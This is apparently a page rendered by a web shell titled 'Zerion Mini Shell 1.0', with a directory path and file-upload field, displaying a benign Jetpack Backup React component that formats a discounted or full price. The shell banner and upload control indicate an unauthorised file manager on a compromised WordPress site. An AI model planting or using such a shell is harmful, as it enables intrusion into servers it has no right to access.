Mini Shell

Direktori : /home/brasafestival/www/old/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-backup/src/js/components/backup-storage-space/storage-addon-upsell-prompt/
Upload File :
Current File : /home/brasafestival/www/old/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-backup/src/js/components/backup-storage-space/storage-addon-upsell-prompt/price.js

import { getCurrencyObject } from '@automattic/format-currency';

const Price = ( { fullPrice, discountedPrice, currency, hidePriceFraction } ) => {
	const finalPrice = discountedPrice > 0 ? discountedPrice : fullPrice;

	const { symbol, integer, fraction } = getCurrencyObject( finalPrice, currency );
	const showPriceFraction = hidePriceFraction === false || ! fraction.endsWith( '00' );
	return (
		<span>
			{ symbol }
			{ integer }
			{ showPriceFraction && fraction }
		</span>
	);
};

export default Price;

Zerion Mini Shell 1.0